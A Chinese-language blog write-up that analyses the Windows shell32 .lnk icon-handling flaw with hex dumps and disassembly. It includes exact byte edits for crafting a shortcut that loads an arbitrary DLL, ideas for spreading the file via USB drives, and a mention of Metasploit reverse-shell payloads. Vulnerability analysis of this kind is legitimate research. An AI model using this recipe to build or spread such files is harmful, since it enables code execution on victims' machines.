前言
windows的shell32在处理控制面板程序的快捷方式文件时,存在一个漏洞,可以加载硬盘上的任意DLL文件,即可执行任意代码。
漏洞文件的生成
到“控制面板”下面,右键点“显示”,点“创建快捷方式”,把快捷方式创建在桌面上。然后在桌面用WinHex打开“显示.lnk”文件。
Offset 0 1 2 3 4 5 6 7 8 9 A B C D E F
00000000 4C 00 00 00 01 14 02 00 00 00 00 00 C0 00 00 00 L...........?..
00000010 00 00 00 46 81 00 00 00 00 00 00 00 00 00 00 00 ...F?..........
00000020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000030 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 ................
00000040 00 00 00 00 00 00 00 00 00 00 00 00 CC 00 14 00 ............?..
00000050 1F 50 E0 4F D0 20 EA 3A 69 10 A2 D8 08 00 2B 30 .P郞??i.⒇..+0
00000060 30 9D 14 00 2E 00 20 20 EC 21 EA 3A 69 10 A2 DD 0?... ??i.⑤
00000070 08 00 2B 30 30 9D A2 00 00 00 9C FF FF FF 00 00 ..+00潰...?..
00000080 00 00 00 6A 00 00 00 00 00 00 1D 00 20 00 44 00 ...j........ .D.
00000090 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 :.\.W.I.N.D.O.W.
000000A0 53 00 5C 00 73 00 79 00 73 00 74 00 65 00 6D 00 S.\.s.y.s.t.e.m.
000000B0 33 00 32 00 5C 00 64 00 65 00 73 00 6B 00 2E 00 3.2.\.d.e.s.k...
000000C0 63 00 70 00 6C 00 00 00 3E 66 3A 79 00 00 F4 66 c.p.l...>f:y..鬴
000000D0 39 65 A8 60 84 76 4C 68 62 97 84 76 16 59 C2 89 9e╜剉Lhb梽v.Y
000000E0 0C FF 8B 4F 82 59 CC 80 6F 66 01 30 4F 5C 55 5E .婳俌虁of.0O\U^
000000F0 DD 4F A4 62 0B 7A 8F 5E 01 30 9C 98 72 82 01 30 軴.z廭.0湗r?0
00000100 57 5B 53 4F 27 59 0F 5C 8C 54 4F 5C 55 5E 06 52 W[SO'Y.\孴O\U^.R
00000110 A8 8F 87 73 02 30 00 00 00 00 00 00 00 00 ◤噑.0........
把偏移7A处的9C FF FF FF改成00 00 00 00,把后面的文件名D:\WINDOWS\system32\desk.cpl改成C:\dll.dll(UNICODE格式)。保存文件。把这个文件复制到任意目录下,当用户浏览该目录时,就会加载C:\dll.dll文件。
Lnk文件格式的相关地方
Lnk的目标文件存放在Shell Item Id List的SHITEMID结构里面,这个结构是按照层来表示一个目标的。上面那个lnk文件里面,第一层是
14 00 ............?..
00000050 1F 50 E0 4F D0 20 EA 3A 69 10 A2 D8 08 00 2B 30 .P郞??i.⒇..+0
00000060 30 9D
14 00代表长度,后面的16字节是“我的电脑”的GUID {20D04FE0-3AEA-1069-A2D8-08002B30309D},注册表里可以搜到。第二层是
14 00 2E 00 20 20 EC 21 EA 3A 69 10 A2 DD 0?... ??i.⑤
00000070 08 00 2B 30 30 9D
这个是“控制面板”的GUID {21EC2020-3AEA-1069-A2DD-08002B30309D}。
第三层就是后面长度为0xA2的目标文件。这里面偏移0x7A处的9C FF FF FF是用来指明快捷方式图标的index。貌似是这样的。
所以这个Shell Item Id List所指向的文件就是:我的电脑->控制面板->D:\WINDOWS\system32\desk.cpl。
对于普通文件的快捷方式,好像是:我的电脑->盘符->目录1->目录2…->文件名。
漏洞产生的地方
shell32在处理lnk文件的时候要把它的图标显示出来,对于一般文件应该是从Icon filename string里面解析,但对于文件后面没有Icon filename string结构的控制面板快捷方式,是直接从0x7A那里的iconindex来解析。当这个iconindex是0的时候,会去加载cpl文件,调用CPlApplet接口,这样就存在执行DLL中代码的问题。
7D716064 53 push ebx
7D716065 FF75 10 push dword ptr [ebp+10]
7D716068 8D5E 0C lea ebx, dword ptr [esi+C]
7D71606B 53 push ebx
7D71606C FF75 0C push dword ptr [ebp+C] ;C:\dll.dll,0,<-这个0就是从偏移7A那里得到的iconindex
7D71606F FF15 0015597D call dword ptr [<&KERNEL32.lstrcpynW>>; kernel32.lstrcpynW
7D716075 6A 2C push 2C
7D716077 FF75 0C push dword ptr [ebp+C]
7D71607A FF15 F41B597D call dword ptr [<&SHLWAPI.StrChrW>] ; shlwapi.StrChrW
7D716080 85C0 test eax, eax
7D716082 74 5D je short 7D7160E1
7D716084 66:8320 00 and word ptr [eax], 0
7D716088 83C0 02 add eax, 2
7D71608B 50 push eax
7D71608C FF15 641C597D call dword ptr [<&SHLWAPI.StrToIntW>] ; shlwapi.StrToIntW
7D716092 8B7D 14 mov edi, dword ptr [ebp+14]
7D716095 8907 mov dword ptr [edi], eax
7D716097 8B45 18 mov eax, dword ptr [ebp+18]
7D71609A C700 02000000 mov dword ptr [eax], 2
7D7160A0 8B0F mov ecx, dword ptr [edi]
7D7160A2 33D2 xor edx, edx
7D7160A4 3BCA cmp ecx, edx ;偏移0x7A必须得是0,才会LoadLibary
7D7160A6 75 33 jnz short 7D7160DB
7D7160A8 C700 1A000000 mov dword ptr [eax], 1A
7D7160AE 8D86 14020000 lea eax, dword ptr [esi+214]
7D7160B4 3910 cmp dword ptr [eax], edx
7D7160B6 8955 0C mov dword ptr [ebp+C], edx
7D7160B9 75 16 jnz short 7D7160D1
7D7160BB 8D4D 0C lea ecx, dword ptr [ebp+C]
7D7160BE 51 push ecx
7D7160BF 8D8E 18020000 lea ecx, dword ptr [esi+218]
7D7160C5 51 push ecx
7D7160C6 50 push eax
7D7160C7 53 push ebx
7D7160C8 E8 48C4F2FF call 7D642515 ;这里调用后面
后面
7D63866D FF15 6415597D call dword ptr [<&KERNEL32.GetCurrent>; kernel32.GetCurrentProcessId
7D638673 50 push eax
7D638674 56 push esi
7D638675 68 00001000 push 100000 ; UNICODE "f1df_6.0.2600.5512_x-ww_35d4ce83\"
7D63867A 8985 E4FDFFFF mov dword ptr [ebp-21C], eax
7D638680 FF15 6815597D call dword ptr [<&KERNEL32.OpenProces>; kernel32.OpenProcess
7D638686 3BC6 cmp eax, esi
7D638688 8985 E8FDFFFF mov dword ptr [ebp-218], eax
7D63868E 0F84 E5000000 je 7D638779
7D638694 8D85 F4FDFFFF lea eax, dword ptr [ebp-20C]
7D63869A 50 push eax
7D63869B FF15 A41C597D call dword ptr [<&SHLWAPI.PathFileExi>; shlwapi.PathFileExistsW
7D6386A1 85C0 test eax, eax
7D6386A3 C785 BCFDFFFF 2>mov dword ptr [ebp-244], 20
7D6386AD 74 14 je short 7D6386C3
7D6386AF 8D85 F4FDFFFF lea eax, dword ptr [ebp-20C]
7D6386B5 89B5 C0FDFFFF mov dword ptr [ebp-240], esi
7D6386BB 8985 C4FDFFFF mov dword ptr [ebp-23C], eax
7D6386C1 EB 1A jmp short 7D6386DD
7D6386C3 C785 C0FDFFFF 0>mov dword ptr [ebp-240], 8
7D6386CD 899D C4FDFFFF mov dword ptr [ebp-23C], ebx
7D6386D3 C785 D0FDFFFF 7>mov dword ptr [ebp-230], 7B
7D6386DD 8D85 BCFDFFFF lea eax, dword ptr [ebp-244]
7D6386E3 50 push eax
7D6386E4 FF15 6C15597D call dword ptr [<&KERNEL32.CreateActC>; kernel32.CreateActCtxW
7D6386EA 83F8 FF cmp eax, -1
7D6386ED 8985 F0FDFFFF mov dword ptr [ebp-210], eax
7D6386F3 75 06 jnz short 7D6386FB
7D6386F5 89B5 F0FDFFFF mov dword ptr [ebp-210], esi
7D6386FB 8B3D 8C15597D mov edi, dword ptr [<&KERNEL32.Activ>; kernel32.ActivateActCtx
7D638701 8D85 ECFDFFFF lea eax, dword ptr [ebp-214]
7D638707 50 push eax
7D638708 FFB5 F0FDFFFF push dword ptr [ebp-210]
7D63870E FFD7 call edi
7D638710 33F6 xor esi, esi
7D638712 46 inc esi
7D638713 56 push esi
7D638714 56 push esi
7D638715 56 push esi
7D638716 53 push ebx
7D638717 FF15 00F0787D call dword ptr [7D78F000] ; apphelp.ApphelpCheckExe
7D63871D 85C0 test eax, eax
7D63871F 75 08 jnz short 7D638729
7D638721 2185 E0FDFFFF and dword ptr [ebp-220], eax
7D638727 EB 0D jmp short 7D638736
7D638729 53 push ebx ;加载DLL
7D63872A FF15 A015597D call dword ptr [<&KERNEL32.LoadLibrar>; kernel32.LoadLibraryW
7D638730 8985 E0FDFFFF mov dword ptr [ebp-220], eax ; dll.01C00000
利用
据说病毒样本是通过这个漏洞利用U盘来传播的,不过我发现加载DLL必须是绝对路径,用相对路径是不行的,那病毒就必须要知道U盘的盘符才能加载U盘上的DLL。不知道这个问题是怎么解决的呢?我没有仔细研究lnk文件格式,不知道是不是可以放多个目标地址。我能想到的就只有一个很笨的办法,感染的时候在U盘上创建20多个.lnk文件,一个盘符对应一个,这样总能覆盖到U盘所在盘符。另外利用共享目录来传播也存在同样问题。
其实我觉得这个也不算是一个真正意义上的漏洞,因为既然要解析出图标,加载对应的DLL文件也是说得过去的,凑巧被病毒利用上了而已。
博主评论:
请看上边的红色粗体字,不存在什么路径不路径的问题,系统的某些dll是可以传值执行的,调用即可。另外Metasploit Framework生成的直接可以执行任意ShellCode(直接反弹Cmd Shell)。